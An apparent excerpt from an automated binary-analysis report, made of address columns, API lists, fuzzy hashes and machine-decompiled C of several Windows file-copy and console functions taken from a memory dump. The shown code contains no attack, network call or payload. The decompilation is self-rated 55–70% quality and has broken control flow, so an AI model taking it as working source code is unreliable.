                                0x4a565b21
                                0x4a55bc1f
                                0x4a55bc2c
                                0x4a55bc2c
                                0x4a55bbe6
                                0x4a55bbe8
                                0x4a55bbe8
                                0x4a55bbeb
                                0x4a55bbeb
                                0x4a55bbef
                                0x4a55bbf0
                                0x4a55bbf9
                                0x4a55bbfd
                                0x4a55bc03
                                0x4a55bc05
                                0x4a55bc0e
                                0x4a565b28
                                0x4a565b30
                                0x4a565b31
                                0x00000000
                                0x4a565b37
                                0x4a55bc16
                                0x4a565b3a
                                0x4a565b3c
                                0x4a565b3c
                                0x4a565b3f
                                0x4a565b3f
                                0x4a565b43
                                0x4a565b44
                                0x4a565b4d
                                0x4a565b55
                                0x4a565b67
                                0x4a565b68
                                0x4a565b6d
                                0x4a565b6e
                                0x4a565b72
                                0x4a565b74
                                0x4a565b57
                                0x4a565b59
                                0x4a565b5a
                                0x4a565b5d
                                0x4a565b5f
                                0x4a565b5f
                                0x4a565b80
                                0x4a565b86
                                0x4a565b8f
                                0x4a565baf
                                0x4a565bb2
                                0x4a565bb8
                                0x4a565bb8
                                0x4a565bbd
                                0x4a565bc3
                                0x4a565bc3
                                0x4a565bc9
                                0x00000000
                                0x00000000
                                0x4a565bce
                                0x4a565be5
                                0x4a565be5
                                0x4a565bee
                                0x4a565bf0
                                0x00000000
                                0x00000000
                                0x4a565bf6
                                0x4a565bfb
                                0x4a565c01
                                0x4a565c01
                                0x4a565c07
                                0x00000000
                                0x00000000
                                0x4a565c0c
                                0x4a565c23
                                0x4a565c23
                                0x4a565c2c
                                0x4a565c2e
                                0x00000000
                                0x00000000
                                0x4a565c34
                                0x4a565c3a
                                0x4a565c3d
                                0x4a565c3d
                                0x4a565c41
                                0x4a565c42
                                0x4a565c4b
                                0x00000000
                                0x00000000
                                0x4a565c58
                                0x4a565cd0
                                0x4a565cd6
                                0x4a565cd9
                                0x4a565cd9
                                0x4a565cdd
                                0x4a565cde
                                0x4a565ce3
                                0x4a565ceb
                                0x4a565cf1
                                0x4a565cf7
                                0x4a565cfa
                                0x4a565cfa
                                0x4a565cfe
                                0x4a565cff
                                0x4a565d06
                                0x4a565d08
                                0x4a565d08
                                0x00000000
                                0x4a565d08
                                0x4a565ced
                                0x4a565ced
                                0x00000000
                                0x4a565ced
                                0x4a565c68
                                0x4a565c6d
                                0x4a565c73
                                0x4a565c76
                                0x4a565c76
                                0x4a565c7a
                                0x4a565c7b
                                0x4a565c84
                                0x4a565c86
                                0x4a565c9d
                                0x4a565cb8
                                0x00000000
                                0x00000000
                                0x4a565cc6
                                0x4a565cc8
                                0x4a565ccc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a565cce
                                0x4a565c0e
                                0x4a565c12
                                0x4a565c16
                                0x00000000
                                0x00000000
                                0x4a565c18
                                0x4a565c1b
                                0x4a565c21
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a565c21
                                0x4a565c27
                                0x4a565c29
                                0x00000000
                                0x4a565c29
                                0x4a565bd0
                                0x4a565bd4
                                0x4a565bd8
                                0x00000000
                                0x00000000
                                0x4a565bda
                                0x4a565bdd
                                0x4a565be3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a565be3
                                0x4a565be9
                                0x4a565beb
                                0x00000000
                                0x4a565d0a
                                0x4a565d1d
                                0x4a565d1f
                                0x4a565d27
                                0x4a565d33
                                0x4a565d35
                                0x4a565d3d
                                0x4a565d3e
                                0x00000000
                                0x00000000
                                0x4a565d44
                                0x4a565d47
                                0x00000000
                                0x00000000
                                0x4a565d4d
                                0x4a565d4f
                                0x4a565d50
                                0x4a565d56
                                0x00000000
                                0x4a565d58
                                0x4a565b99
                                0x4a565b9b
                                0x4a565ba4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a565baa
                                0x4a55bc1c
                                0x4a55bc1e
                                0x00000000

                                APIs
                                • GetFileAttributesW.KERNEL32(00000000,00000104,?), ref: 4A55BC05
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 317d61835de517b6172a769e647bd44b6024cceca3b2818d7e0fcbffd1a9dad1
                                • Instruction ID: 6a91bb95aba8bd7875196144384c561232c5270fbf7ebc9b72f2a2ba8a3cdefc
                                • Opcode Fuzzy Hash: 317d61835de517b6172a769e647bd44b6024cceca3b2818d7e0fcbffd1a9dad1
                                • Instruction Fuzzy Hash: 35819B71501207DBDB14AF34CE48AEA37B8EF69324F4546A5E91ADB1A9FB30DB44CB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556E47, Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E4A556E47(WCHAR* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _v604;
				void* _v608;
				signed int _v612;
				WCHAR* _v616;
				void _v620;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				void* _t52;
				void* _t54;
				void* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t72;
				signed int _t74;
				void _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				signed int _t83;
				void* _t86;
				short* _t94;
				WCHAR* _t95;
				void* _t96;
				void* _t97;
				int _t98;
				void* _t99;
				void* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;

				_t47 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t47 ^ _t104;
				_t95 = _a4;
				_v616 = _t95;
				_t94 =  &(_t95[1]);
				do {
					__cx =  *__eax;
					__eax = __eax + 1;
					__eax = __eax + 1;
					__eflags = __cx;
				} while (__cx != 0);
				__eax = __eax - __edx;
				__eax = __eax >> 1;
				__eflags = __eax - _a8;
				_v612 = __eax;
				if(__eax > _a8) {
					__eax = 0;
				} else {
					_push(__esi);
					__esi = __edi + 6;
					_v604 = __esi;
					_push(__ebx);
					do {
						_t75 =  *_t99 & 0x0000ffff;
						_v620 = _t75;
						__eflags = _t75;
						if(_t75 == 0) {
							L13:
							 *_t99 = 0;
							_t52 = FindFirstFileW(_t95,  &_v600);
							 *_t99 = _t75;
							__eflags = _t52 - 0xffffffff;
							if(_t52 == 0xffffffff) {
								_t101 = _t99 + 2;
								_v604 = _t101;
								goto L9;
							} else {
								FindClose(_t52);
								__eflags = _v600.cAlternateFileName;
								if(_v600.cAlternateFileName != 0) {
									__eflags = _a12;
									if(_a12 != 0) {
										L2:
										_t57 =  &(_v600.cAlternateFileName);
										goto L16;
									} else {
										_t72 =  &(_v600.cAlternateFileName);
										__imp___wcsnicmp(_t72, _v604, _t99 - _v604 >> 1);
										_t105 = _t105 + 0xc;
										__eflags = _t72;
										if(_t72 != 0) {
											goto L15;
										} else {
											_t74 =  &(_v600.cFileName);
											__imp___wcsicmp(_t74,  &(_v600.cAlternateFileName));
											__eflags = _t74;
											if(_t74 != 0) {
												goto L2;
											} else {
												goto L15;
											}
										}
									}
									L18:
									_t60 = _t57 - _t94 >> 1;
									_t76 = _t60;
									_t61 = _t60 - (_t99 - _v604 >> 1);
									_t83 = _v612 + _t61;
									__eflags = _t83 - _a8;
									if(_t83 >= _a8) {
										_t54 = 0;
										goto L11;
									} else {
										_v612 = _t83;
										__eflags = _t61;
										if(_t61 > 0) {
											_t86 = _t99;
											_t96 = _t86 + 2;
											do {
												_t94 =  *_t86;
												_t86 = _t86 + 2;
												__eflags = _t94;
											} while (_t94 != 0);
											_t97 = _t99 + _t61 * 2;
											memmove(_t97, _t99, (_t86 - _t96 >> 1) + (_t86 - _t96 >> 1) + 1);
											_t105 = _t105 + 0xc;
											_t99 = _t97;
										}
										_t98 = _t76 + _t76;
										memcpy(_v604, _v608, _t98);
										_v604 = _v604 + _t98;
										_t105 = _t105 + 0xc;
										E4A55185A(_v604, _a8 - (_v604 - _v616 >> 1), _t99);
										_v604 = _v604 + 2;
										_t101 = _v604;
										_t95 = _v616;
										_t75 = _v620;
										goto L9;
									}
									goto L30;
								} else {
									L15:
									_t57 =  &(_v600.cFileName);
								}
								L16:
								_v608 = _t57;
								_t17 = _t57 + 2; // 0x2
								_t94 = _t17;
								do {
									_t78 =  *_t57;
									_t57 = _t57 + 2;
									__eflags = _t78;
								} while (_t78 != 0);
								goto L18;
							}
							L30:
						} else {
							__eflags = _t75 -  *0x4a590664; // 0x5c
							if(__eflags == 0) {
								goto L13;
							} else {
								goto L9;
							}
						}
						L11:
						_pop(_t77);
						_pop(_t103);
						goto L12;
						L9:
						_t99 = _t101 + 2;
					} while (_t75 != 0);
					_t54 = 1;
					goto L11;
				}
				L12:
				return E4A5513A9(_t54, _t77, _v8 ^ _t104, _t94, _t95, _t103);
				goto L30;
			}





































                                0x4a556e52
                                0x4a556e59
                                0x4a556e5d
                                0x4a556e62
                                0x4a556e68
                                0x4a556e6b
                                0x4a556e6b
                                0x4a556e6e
                                0x4a556e6f
                                0x4a556e70
                                0x4a556e70
                                0x4a556e75
                                0x4a556e77
                                0x4a556e79
                                0x4a556e7c
                                0x4a556e82
                                0x4a569ebd
                                0x4a556e88
                                0x4a556e88
                                0x4a556e89
                                0x4a556e8c
                                0x4a556e92
                                0x4a556e93
                                0x4a556e93
                                0x4a556e96
                                0x4a556e9c
                                0x4a556e9f
                                0x4a556ec5
                                0x4a556ec7
                                0x4a556ed2
                                0x4a556ed8
                                0x4a556edb
                                0x4a556ede
                                0x4a556d24
                                0x4a556d25
                                0x00000000
                                0x4a556ee4
                                0x4a556ee5
                                0x4a556eeb
                                0x4a556ef0
                                0x4a556f9c
                                0x4a556fa0
                                0x4a556d30
                                0x4a556d30
                                0x00000000
                                0x4a556fa6
                                0x4a556fb7
                                0x4a556fbb
                                0x4a556fc1
                                0x4a556fc4
                                0x4a556fc6
                                0x00000000
                                0x4a556fcc
                                0x4a569ec8
                                0x4a569ecf
                                0x4a569ed7
                                0x4a569ed9
                                0x00000000
                                0x4a569edf
                                0x00000000
                                0x4a569edf
                                0x4a569ed9
                                0x4a556fc6
                                0x4a556f0f
                                0x4a556f19
                                0x4a556f1d
                                0x4a556f1f
                                0x4a556f27
                                0x4a556f29
                                0x4a556f2c
                                0x4a556d38
                                0x00000000
                                0x4a556f32
                                0x4a556f32
                                0x4a556f38
                                0x4a556f3a
                                0x4a569ee4
                                0x4a569ee6
                                0x4a569ee9
                                0x4a569ee9
                                0x4a569eed
                                0x4a569eee
                                0x4a569eee
                                0x4a569ef7
                                0x4a569f01
                                0x4a569f07
                                0x4a569f0a
                                0x4a569f0a
                                0x4a556f40
                                0x4a556f50
                                0x4a556f55
                                0x4a556f6a
                                0x4a556f79
                                0x4a556f7e
                                0x4a556f85
                                0x4a556f8b
                                0x4a556f91
                                0x00000000
                                0x4a556f91
                                0x00000000
                                0x4a556ef6
                                0x4a556ef6
                                0x4a556ef6
                                0x4a556ef6
                                0x4a556efc
                                0x4a556efc
                                0x4a556f02
                                0x4a556f02
                                0x4a556f05
                                0x4a556f05
                                0x4a556f09
                                0x4a556f0a
                                0x4a556f0a
                                0x00000000
                                0x4a556f05
                                0x00000000
                                0x4a556ea1
                                0x4a556ea1
                                0x4a556ea8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556ea8
                                0x4a556eb4
                                0x4a556eb4
                                0x4a556eb5
                                0x00000000
                                0x4a556eaa
                                0x4a556eab
                                0x4a556eac
                                0x4a556eb3
                                0x00000000
                                0x4a556eb3
                                0x4a556eb6
                                0x4a556ec2
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                • String ID:
                                • API String ID: 242869866-0
                                • Opcode ID: de2fcf7186fbe49eb514cf4dda7a24341ba961807d73a9e22596a35ca5d82571
                                • Instruction ID: fc42b3ccd207fe4e93922804df54f35c37dea645e149747f130ab85746a5b684
                                • Opcode Fuzzy Hash: de2fcf7186fbe49eb514cf4dda7a24341ba961807d73a9e22596a35ca5d82571
                                • Instruction Fuzzy Hash: AB51263190125ADBCB20DF64CE486AEBBB8FF45354F04069AE845E3558E770AA85CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5618A6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 55%
                                			E4A5618A6(signed int __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long* _v16;
				void _v20;
				long _v24;
				void _v28;
				void* __ebx;
				void* __edi;
				signed int _t17;
				intOrPtr _t21;
				intOrPtr _t23;
				long _t26;
				void* _t38;
				void* _t41;

				_t42 = __edx;
				_v16 = 0;
				_t17 = E4A56103D(2) & 0x000000ff;
				_push(0);
				 *0x4a57415c = _t17;
				L4A551BC7();
				_t41 = 0x4a574ac0;
				if(_t17 != 0) {
					return 1;
				}
				E4A552C56(_t38, __edx, 0, 0x4a575260, 0x104, 0);
				_t21 =  *0x4a574134; // 0x0
				 *0x4a5741e8 = 1;
				 *0x4a5741f0 = 1;
				 *0x4a574164 = 0;
				 *0x4a574168 = 1;
				 *0x4a57409c = 1;
				 *0x4a5740e8 = 0;
				 *0x4a5740ec = 0;
				 *0x4a5740f0 = 0;
				 *0x4a574160 = _t21;
				_v8 = E4A5619DD();
				_t23 = E4A5619DD();
				_push(_t23);
				_push(_v8);
				_v12 = _t23;
				_push(_a4);
				E4A5619F4();
				_t26 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v28, 4, 0);
				_v24 = _t26;
				if(_t26 >= 0) {
					_v20 = 2;
					NtSetInformationProcess(0xffffffff, 0x27,  &_v20, 4);
				}
				_push(_v12);
				_push(_v8);
				if( *0x4a574168 == 4) {
					E4A56F6CF(_t42);
				} else {
					_v16 = E4A5612D2(_t42);
				}
				if(_v24 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
				}
				E4A5599E1(_t41, 0x2336, 1, E4A559A2C("%9d",  *0x4a574164));
				 *0x4a57415c = E4A56103D(2) & 0x000000ff;
				return _v16;
			}

















                                0x4a5618a6
                                0x4a5618b5
                                0x4a5618bd
                                0x4a5618c0
                                0x4a5618c6
                                0x4a5618cb
                                0x4a5618d1
                                0x4a5618d4
                                0x00000000
                                0x4a569537
                                0x4a5618e5
                                0x4a5618ea
                                0x4a5618f2
                                0x4a5618f8
                                0x4a5618fe
                                0x4a561904
                                0x4a56190a
                                0x4a561910
                                0x4a561916
                                0x4a56191c
                                0x4a561922
                                0x4a56192c
                                0x4a56192f
                                0x4a561934
                                0x4a561935
                                0x4a561938
                                0x4a56193b
                                0x4a56193e
                                0x4a56194e
                                0x4a56195c
                                0x4a56195f
                                0x4a56196b
                                0x4a561972
                                0x4a561972
                                0x4a56197b
                                0x4a56197e
                                0x4a561981
                                0x4a56953d
                                0x4a561987
                                0x4a56198c
                                0x4a56198c
                                0x4a561992
                                0x4a56199e
                                0x4a56199e
                                0x4a5619b7
                                0x4a5619c9
                                0x00000000

                                APIs
                                • _setjmp3.MSVCRT ref: 4A5618CB
                                  • Part of subcall function 4A552C56: GetCurrentDirectoryW.KERNEL32(00000000,?,766F1AE8), ref: 4A552C7B
                                • NtQueryInformationProcess.NTDLL ref: 4A56194E
                                • NtSetInformationProcess.NTDLL ref: 4A561972
                                • NtSetInformationProcess.NTDLL ref: 4A56199E
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InformationProcess$CurrentDirectoryQuery_setjmp3
                                • String ID: %9d
                                • API String ID: 992017704-2241623522
                                • Opcode ID: 50c72157cc2809877868cae0d5fea70b0549666433fe0e74667b34fb4a974844
                                • Instruction ID: a40ad53010a3c636aad7d253328815bf60c1934e0ed1744b94dc2f5cb399ea19
                                • Opcode Fuzzy Hash: 50c72157cc2809877868cae0d5fea70b0549666433fe0e74667b34fb4a974844
                                • Instruction Fuzzy Hash: C2317EF5D41215EAD701BFA5CA05ABABBBCFB96724F104117E224EB5A1D7704900CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56F6CF, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 384COMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E4A56F6CF(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v528;
				char _v1048;
				char _v1568;
				void* _v1572;
				char _v1576;
				intOrPtr* _v1580;
				char _v1584;
				void* _v1588;
				signed int _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				char _v1604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t122;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t132;
				void* _t136;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t153;
				signed char _t158;
				signed int _t162;
				void* _t164;
				signed int _t168;
				signed int _t172;
				signed int _t178;
				signed int _t181;
				void* _t184;
				signed int _t185;
				void* _t188;
				signed int _t195;
				void* _t197;
				signed int _t201;
				void* _t204;
				void* _t209;
				signed int _t210;
				void* _t213;
				void* _t214;
				signed int _t218;
				signed int _t220;
				intOrPtr _t221;
				signed int _t222;
				void* _t223;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t234;

				_t229 = __edx;
				_t122 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t122 ^ _t234;
				_t232 = _a4;
				_v1596 = _a8;
				_t222 = 0;
				_t230 = 0x80;
				_t126 = E4A560FEB(0xfe00, 0x80,  &_v1584, 0);
				_v1580 = _t126;
				if(_t126 != 0) {
					__eflags =  *0x4a57415c - _t222; // 0x0
					if(__eflags == 0) {
						L6:
						_t233 =  *((intOrPtr*)(_t232 + 0x20));
						while(1) {
							_t127 = E4A556A35(_t222, _t223, _t229,  *_t233);
							__eflags = _t127;
							if(_t127 != 0) {
								break;
							}
							_t233 =  *((intOrPtr*)(_t233 + 0x20));
							__eflags = _t233 - _t222;
							if(_t233 == _t222) {
								L63:
								_t128 = 0;
								__eflags = 0;
								L64:
								return E4A5513A9(_t128, _t222, _v8 ^ _t234, _t229, _t230, _t233);
							}
						}
						E4A553117( *_t233, 0x21,  *((intOrPtr*)(_t233 + 0x18)),  &_v1576);
						while(1) {
							 *(_t233 + 0x1c) =  *(_t233 + 0x1c) & 0xffff3fff;
							_t132 =  *(_t233 + 0x1c);
							__eflags = _t132 & 0x00000004;
							if((_t132 & 0x00000004) != 0) {
								_t218 = _t132 & 0xfffffffb | 0x00000002;
								__eflags = _t218;
								 *(_t233 + 0x1c) = _t218;
							}
							__eflags =  *0x4a5741b4 - _t222; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t230 = 0x104;
							_t136 = E4A56113B(_t223, _t233,  &_v1568, 0x104);
							__eflags = _t136 - 1;
							if(_t136 == 1) {
								break;
							}
							E4A5558F3(L"%s\r\n",  *((intOrPtr*)(_t233 + 4)));
							_pop(_t223);
							_t139 = E4A561CA5(_t223, _t229, _t233, _v1596,  &_v528, 0x104, _t222);
							__eflags = _t139 - 1;
							if(_t139 == 1) {
								break;
							}
							__eflags = _v528 - _t222;
							if(_v528 == _t222) {
								L61:
								_t140 = E4A5595F8( *((intOrPtr*)(_t233 + 0x18)), 0x21, _v1576);
								__eflags = _t140;
								if(_t140 != 0) {
									continue;
								}
								E4A552F5C(_v1576);
								goto L63;
							}
							_t143 = E4A56F25D(_t222, _t223,  *((intOrPtr*)(_t233 + 4)),  &_v528);
							__eflags = _t143;
							if(_t143 == 0) {
								_t231 = E4A561F66( *((intOrPtr*)(_t233 + 4)), ( *(_t233 + 0x1c) & 0x00000800) << 0xa);
								__eflags = _t231 - 0xffffffff;
								if(_t231 == 0xffffffff) {
									E4A552F5C(_v1576);
									L67:
									E4A56056B(0x6e);
									L68:
									_push(1);
									_push(_t222);
									L69:
									L4A56F2D7(_t223);
									L70:
									E4A552F5C(_v1576);
									E4A553AB3(_t231);
									goto L67;
								}
								_t153 = E4A553B03(_t147, _t223, _t231);
								__eflags = _t153;
								if(_t153 != 0) {
									_v1584 = 0x80;
								}
								_push( &_v528);
								_push(_v1572);
								_push(_t233);
								_push( &_v1588);
								_v1600 = E4A5610A5( &_v1588, _t231, _v1580, _v1584);
								__eflags =  *0x4a574128 - _t222; // 0x0
								if(__eflags != 0) {
									goto L70;
								} else {
									_t158 = GetFileAttributesW( &_v528);
									__eflags = _t158 & 0x00000002;
									if((_t158 & 0x00000002) != 0) {
										_v1572 = E4A56FDFD( &_v528, 1, _t222);
										L26:
										__eflags = _v1572 - 0xffffffff;
										if(_v1572 == 0xffffffff) {
											goto L70;
										}
										__eflags =  *0x4a574120 - _t222; // 0x0
										if(__eflags == 0) {
											L33:
											__eflags = _v1600 - 1;
											if(_v1600 != 1) {
												L39:
												 *0x4a574120 = _t222;
												E4A553AB3(_t231);
												L40:
												 *0x4a5741e8 = _t222;
												_t231 =  *((intOrPtr*)(_t233 + 0x20));
												while(1) {
													__eflags = _t231 - _t222;
													if(_t231 == _t222) {
														break;
													}
													_t162 =  *(_t231 + 0x1c);
													__eflags = _t162 & 0x00000004;
													if((_t162 & 0x00000004) != 0) {
														_t195 = _t162 & 0xfffffffb | 0x00000002;
														__eflags = _t195;
														 *(_t231 + 0x1c) = _t195;
													}
													_t164 = E4A561D9B(_t223,  &_v1048, 0x104,  *_t231,  *((intOrPtr*)(_t233 + 4)));
													__eflags = _t164 - _t222;
													if(_t164 == _t222) {
														E4A5558F3(L"%s\r\n",  &_v1048);
													} else {
														_push(_t222);
														_push(_t164);
														E4A5599E1(_t223);
													}
													_pop(_t223);
													_t168 = E4A556A35(_t222, _t223, _t229,  &_v1048);
													__eflags = _t168;
													if(_t168 == 0) {
														L58:
														_t231 =  *((intOrPtr*)(_t231 + 0x20));
														continue;
													} else {
														_t172 = E4A56F25D(_t222, _t223,  &_v1048,  &_v528);
														_push(_t222);
														__eflags = _t172;
														if(_t172 == 0) {
															_push( &_v1048);
															_t222 = E4A561F66();
															__eflags = _t222 - 0xffffffff;
															if(_t222 == 0xffffffff) {
																E4A552F5C(_v1576);
																E4A553AB3(_v1572);
																E4A56056B(0x6e);
																L72:
																_push(1);
																_push(0);
																goto L69;
															}
															_t178 = E4A553B03(_t174, _t223, _t222);
															__eflags = _t178;
															if(_t178 != 0) {
																_v1584 = 0x80;
															}
															while(1) {
																__eflags =  *0x4a574120;
																if( *0x4a574120 != 0) {
																	break;
																}
																_push( &_v528);
																_push(_v1572);
																_push(_t231);
																_push( &_v1588);
																_t181 = E4A5610A5( &_v1588, _t222, _v1580, _v1584);
																__eflags = _t181;
																if(_t181 == 0) {
																	break;
																}
																_t184 = E4A56F619(_v1572, _v1580, _v1588,  &_v528, _t222);
																__eflags =  *0x4a57415c;
																if( *0x4a57415c == 0) {
																	continue;
																}
																_t185 = E4A553B03(_t184, _t223, _v1572);
																__eflags = _t185;
																if(_t185 != 0) {
																	continue;
																}
																_t188 = E4A56F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
																__eflags = _t188 - 1;
																if(_t188 == 1) {
																	E4A552F5C(_v1576);
																	E4A553AB3(_t222);
																	E4A553AB3(_v1572);
																	goto L72;
																}
															}
															 *0x4a574120 =  *0x4a574120 & 0x00000000;
															E4A553AB3(_t222);
															_t222 = 0;
															__eflags = 0;
															goto L58;
														}
														E4A5599E1(_t223);
														_t223 = 0x2340;
														goto L58;
													}
												}
												E4A561BE3(_t233, _v1596, _v1572, _t222);
												 *0x4a5741f0 = 1;
												goto L61;
											}
											_t197 = E4A56F619(_v1572, _v1580, _v1588,  &_v528, _t231);
											__eflags =  *0x4a57415c - _t222; // 0x0
											if(__eflags == 0) {
												L37:
												_push( &_v528);
												_push(_v1572);
												_push(_t233);
												_push( &_v1588);
												_v1600 = E4A5610A5( &_v1588, _t231, _v1580, _v1584);
												L38:
												__eflags =  *0x4a574120 - _t222; // 0x0
												if(__eflags == 0) {
													goto L33;
												}
												goto L39;
											}
											_t201 = E4A553B03(_t197, _t223, _v1572);
											__eflags = _t201;
											if(_t201 != 0) {
												goto L37;
											}
											_t204 = E4A56F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
											__eflags = _t204 - 1;
											if(_t204 == 1) {
												L32:
												E4A552F5C(_v1576);
												E4A553AB3(_t231);
												E4A553AB3(_v1572);
												goto L68;
											}
											goto L37;
										}
										__eflags = _v1588 - _t222;
										if(_v1588 <= _t222) {
											goto L38;
										}
										_t209 = E4A56F619(_v1572, _v1580, _v1588,  &_v528, _t231);
										__eflags =  *0x4a57415c - _t222; // 0x0
										if(__eflags == 0) {
											goto L38;
										}
										_t210 = E4A553B03(_t209, _t223, _v1572);
										__eflags = _t210;
										if(_t210 != 0) {
											goto L38;
										}
										_t213 = E4A56F46A( &_v1572,  &_v528, _v1588, _v1580, _v1592);
										__eflags = _t213 - 1;
										if(_t213 != 1) {
											goto L38;
										}
										goto L32;
									}
									_t214 = E4A56224D(_t223,  &_v528);
									_v1572 = _t214;
									__eflags = _t214 - 0xffffffff;
									if(_t214 == 0xffffffff) {
										goto L70;
									}
									__imp___get_osfhandle();
									_t223 = _t214;
									SetEndOfFile(_t214);
									goto L26;
								}
							}
							_v1572 = E4A56F354( *((intOrPtr*)(_t233 + 4)), _t233, _v1580, _v1584);
							goto L40;
						}
						E4A552F5C(_v1576);
						goto L1;
					}
					_t220 = E4A560FEB(_v1584, 0x80,  &_v1604, 1);
					_v1592 = _t220;
					__eflags = _t220;
					if(_t220 == 0) {
						goto L1;
					} else {
						_t221 = _v1604;
						__eflags = _v1584 - _t221;
						if(_v1584 >= _t221) {
							_v1584 = _t221;
						}
						goto L6;
					}
				}
				L1:
				_t128 = 1;
				goto L64;
			}

























































                                0x4a56f6cf
                                0x4a56f6da
                                0x4a56f6e1
                                0x4a56f6e9
                                0x4a56f6ed
                                0x4a56f6f3
                                0x4a56f6fd
                                0x4a56f708
                                0x4a56f70d
                                0x4a56f715
                                0x4a56f71f
                                0x4a56f725
                                0x4a56f75a
                                0x4a56f75a
                                0x4a56f76a
                                0x4a56f76c
                                0x4a56f771
                                0x4a56f773
                                0x00000000
                                0x00000000
                                0x4a56f75f
                                0x4a56f762
                                0x4a56f764
                                0x4a56fc10
                                0x4a56fc10
                                0x4a56fc10
                                0x4a56fc12
                                0x4a56fc20
                                0x4a56fc20
                                0x4a56f764
                                0x4a56f783
                                0x4a56f788
                                0x4a56f788
                                0x4a56f78f
                                0x4a56f792
                                0x4a56f794
                                0x4a56f799
                                0x4a56f799
                                0x4a56f79c
                                0x4a56f79c
                                0x4a56f79f
                                0x4a56f7a5
                                0x00000000
                                0x00000000
                                0x4a56f7ab
                                0x4a56f7b9
                                0x4a56f7be
                                0x4a56f7c1
                                0x00000000
                                0x00000000
                                0x4a56f7cf
                                0x4a56f7d5
                                0x4a56f7e6
                                0x4a56f7eb
                                0x4a56f7ee
                                0x00000000
                                0x00000000
                                0x4a56f7f4
                                0x4a56f7fb
                                0x4a56fbed
                                0x4a56fbf8
                                0x4a56fbfd
                                0x4a56fbff
                                0x00000000
                                0x00000000
                                0x4a56fc0b
                                0x00000000
                                0x4a56fc0b
                                0x4a56f80b
                                0x4a56f810
                                0x4a56f812
                                0x4a56f848
                                0x4a56f84a
                                0x4a56f84d
                                0x4a56fc39
                                0x4a56fc3e
                                0x4a56fc40
                                0x4a56fc45
                                0x4a56fc45
                                0x4a56fc47
                                0x4a56fc48
                                0x4a56fc48
                                0x4a56fc4d
                                0x4a56fc53
                                0x4a56fc59
                                0x00000000
                                0x4a56fc59
                                0x4a56f854
                                0x4a56f859
                                0x4a56f85b
                                0x4a56f85d
                                0x4a56f85d
                                0x4a56f86d
                                0x4a56f86e
                                0x4a56f87a
                                0x4a56f87b
                                0x4a56f88e
                                0x4a56f894
                                0x4a56f89a
                                0x00000000
                                0x4a56f8a0
                                0x4a56f8a7
                                0x4a56f8ad
                                0x4a56f8b5
                                0x4a56f8e6
                                0x4a56f8ec
                                0x4a56f8ec
                                0x4a56f8f3
                                0x00000000
                                0x00000000
                                0x4a56f8f9
                                0x4a56f8ff
                                0x4a56f99e
                                0x4a56f99e
                                0x4a56f9a5
                                0x4a56fa48
                                0x4a56fa49
                                0x4a56fa4f
                                0x4a56fa54
                                0x4a56fa54
                                0x4a56fa5a
                                0x4a56fbc8
                                0x4a56fbc8
                                0x4a56fbca
                                0x00000000
                                0x00000000
                                0x4a56fa62
                                0x4a56fa65
                                0x4a56fa67
                                0x4a56fa6c
                                0x4a56fa6c
                                0x4a56fa6f
                                0x4a56fa6f
                                0x4a56fa83
                                0x4a56fa88
                                0x4a56fa8a
                                0x4a56faa1
                                0x4a56fa8c
                                0x4a56fa8c
                                0x4a56fa8d
                                0x4a56fa8e
                                0x4a56fa8e
                                0x4a56faa7
                                0x4a56faaf
                                0x4a56fab4
                                0x4a56fab6
                                0x4a56fbc5
                                0x4a56fbc5
                                0x00000000
                                0x4a56fabc
                                0x4a56faca
                                0x4a56facf
                                0x4a56fad0
                                0x4a56fad2
                                0x4a56faeb
                                0x4a56faf1
                                0x4a56faf3
                                0x4a56faf6
                                0x4a56fc66
                                0x4a56fc71
